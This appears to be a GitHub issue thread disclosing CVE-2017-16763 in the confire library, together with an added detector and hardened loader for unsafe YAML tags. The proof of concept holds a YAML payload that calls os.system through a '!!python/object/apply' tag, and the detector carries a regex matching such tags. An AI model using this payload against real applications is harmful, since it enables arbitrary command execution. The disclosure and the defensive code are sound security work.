Hi, there is a vulnerability in load() method in config.py, please see PoC above. It can execute arbitrary python commands resulting in command execution.
@bbengfort 👋 Hello! I'm on the GitHub team responsible for sending security alerts for vulnerable versions of Python libraries. I see that you have fix commits for this issue (CVE-2017-16763) at 8cc86a5 and 70d3e3f on the develop and master branches, and that 2d52a5d bumps the version to 0.3.0, but I don't see a corresponding version in PyPI nor a release/tag.
We plan to alert users of confire for all current versions (<= 0.2.0) today and would like to offer remediation steps. If you're able, please release version 0.3.0 and we will delay our alerts until after the fix is released. Thank you! 👏
```python
# PoC from the issue: a confire Configuration subclass whose load() reads the
# YAML files listed in CONF_PATHS with an unsafe PyYAML loader.
from confire import Configuration

class MyConfig(Configuration):
    mysetting = True
    logpath = "/var/log/myapp.log"
    appname = "MyApp"

settings = MyConfig.load()

# CONF_PATHS as defined in confire's config.py (the search order used by load()):
# CONF_PATHS = [
#     '/etc/confire.yaml',                    # The global configuration
#     os.path.expanduser('~/.confire.yaml'),  # User specific configuration
#     os.path.abspath('conf/confire.yaml'),   # Local directory configuration
# ]

# Contents of ~/.confire.yaml used by the PoC:
# '~/.confire.yaml': !!python/object/apply:os.system ["calc.exe"]
```
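Added example (not from the confire project or the issue author): a defender-side check for the root cause above, that configuration YAML is parsed with a loader that honours `!!python/*` tags. `find_unsafe_tags` reports such tags with their line numbers, and `load_config_safely` is the hardened replacement for the `yaml.load()` call: it refuses tagged documents and otherwise parses with `yaml.safe_load`. The sample documents are constructed; the command in the unsafe one is a placeholder.

```python
"""Detect and refuse PyYAML python/* tags before loading a config file."""
import re

# Constructed sample of a ~/.confire.yaml abusing the unsafe loader (hypothetical;
# modelled on the issue's PoC, with the command replaced by a placeholder).
UNSAFE_CONFIG = """\
mysetting: false
logpath: /tmp/myapp.log
appname: !!python/object/apply:os.system ["PLACEHOLDER_COMMAND"]
"""

# Constructed benign sample for comparison.
SAFE_CONFIG = """\
mysetting: false
logpath: /tmp/myapp.log
appname: MyApp
"""

# Tags that yaml.load()/yaml.Loader resolve to Python objects or callables,
# in both the short form (!!python/...) and the verbatim form (!<tag:yaml.org,2002:python/...>).
# The scan is deliberately conservative: a tag inside a YAML comment is flagged too.
_UNSAFE_TAG = re.compile(r"!!python/\S+|!<tag:yaml\.org,2002:python/[^>]*>")


def find_unsafe_tags(text):
    """Return a list of (line_number, tag) for every python/* tag in a YAML document."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for match in _UNSAFE_TAG.finditer(line):
            hits.append((lineno, match.group(0)))
    return hits


def load_config_safely(text):
    """Hardened replacement for yaml.load(text): reject python/* tags, then use safe_load."""
    hits = find_unsafe_tags(text)
    if hits:
        raise ValueError("refusing to load config with unsafe tags: %r" % (hits,))
    import yaml  # PyYAML; imported lazily so the scanner works without it installed
    # safe_load only builds plain YAML types (str, int, list, dict, ...), never Python objects.
    return yaml.safe_load(text)
```

`yaml.safe_load` alone would already reject the tagged document with a `ConstructorError`; the scanner adds a readable report with line numbers for logging or pre-deployment linting.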